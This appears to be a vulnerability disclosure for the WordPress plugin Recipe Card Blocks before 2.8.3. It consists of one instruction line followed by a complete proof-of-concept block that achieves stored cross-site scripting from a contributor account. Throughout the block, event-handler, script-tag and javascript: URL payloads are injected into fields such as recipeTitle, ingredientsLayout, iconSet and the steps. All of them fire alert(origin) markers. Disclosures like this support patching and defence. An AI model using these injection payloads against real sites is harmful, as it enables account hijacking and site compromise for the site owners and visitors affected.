Recipe Card Blocks < 2.8.3 - Contributor+ Stored Cross-Site Scripting

As a contributor (or above), while in code editor mode, put the following in a post/page, save and view/preview the page/post to trigger the XSS

<!-- wp:wpzoom-recipe-card/block-recipe-card {"image":{"url":"/"},"hasImage":true,"video":{"type":"self-hosted","video_url":"/","settings":{"onerror=alert(7+origin)":true}},"hasVideo":true,"hasInstance":true,"recipeTitle":"Recipe Card XSS\u0022 style=\u0022animation-name:twentytwentyone-close-button-transition\u0022 onanimationend=\u0022alert(8+origin)//","course":["Uncategorized"],"settings":[{"primary_color":"#222222","icon_details_color":"#6d767f","hide_header_image":false,"print_btn":true,"pin_btn":true,"custom_author_name":"","displayCourse":true,"displayCuisine":true,"displayDifficulty":true,"displayAuthor":true,"displayServings":true,"displayPrepTime":true,"displayCookingTime":true,"displayTotalTime":false,"displayCalories":true,"headerAlign":"center","ingredientsLayout":"1-column\u0022 style=\u0022animation-name:twentytwentyone-close-button-transition\u0022 onanimationend=\u0022alert(2+origin)//"}],"details":[{"id":"detail-item-61163d8e5bd46","iconSet":"oldicon","icon":"food","label":"Servings","unit":"servings","value":"4"},{"id":"detail-item-61163d8e5bd57","iconSet":"\u0022 style=\u0022animation-name:twentytwentyone-close-button-transition\u0022 onanimationend=\u0022alert(origin)//","icon":"clock","label":"Prep time","unit":"minutes","value":"30","_prefix":""},{"id":"detail-item-61163d8e5bd5b","iconSet":"foodicons","icon":"cooking-food-in-a-hot-casserole","label":"Cooking time","unit":"minutes","value":"40"},{"id":"detail-item-61163d8e5bd5f","iconSet":"foodicons","icon":"fire-flames","label":"Calories","unit":"kcal","value":"300"},{"id":"detail-item-61163d8e5bd62","iconSet":"fa","_prefix":"far","icon":"clock"},{"id":"detail-item-61163d8e5bd63","iconSet":"oldicon","icon":"chef-cooking"},{"id":"detail-item-61163d8e5bd64","iconSet":"oldicon","icon":"food-1"},{"id":"detail-item-61163d8e5bd65","iconSet":"fa","_prefix":"fas","icon":"sort-amount-down"},{"id":"detail-item-61163d8e5bd66","iconSet":"fa","_prefix":"far","icon":"clock","label":"Total time","unit":"minutes","value":"70","jsonValue":"70"}],"ingredients":[{"id":"ingredient-item-6116426c49335","name":["Exploit"],"jsonName":"Exploit","isGroup":false},{"id":"ingredient-item-6116426c49336","name":[]},{"id":"ingredient-item-6116426c49337","name":[]},{"id":"ingredient-item-6116426c49338","name":[]}],"steps":[{"id":"direction-step-6116426c49339","text":[{"type":"script onbeforescriptexecute=alert(4+origin)","props":{"children":"alert(3+origin)"}},{"type":"img","props":{"src":"/ \u0022onerror=\u0022alert(5+origin)"}},{"type":"a","props":{"children":"click","href":"javascript:alert(6+origin)","target":""}}],"jsonText":"AAAA","isGroup":false}],"notesTitle":"Notes ","className":"is-style-newdesign"} /-->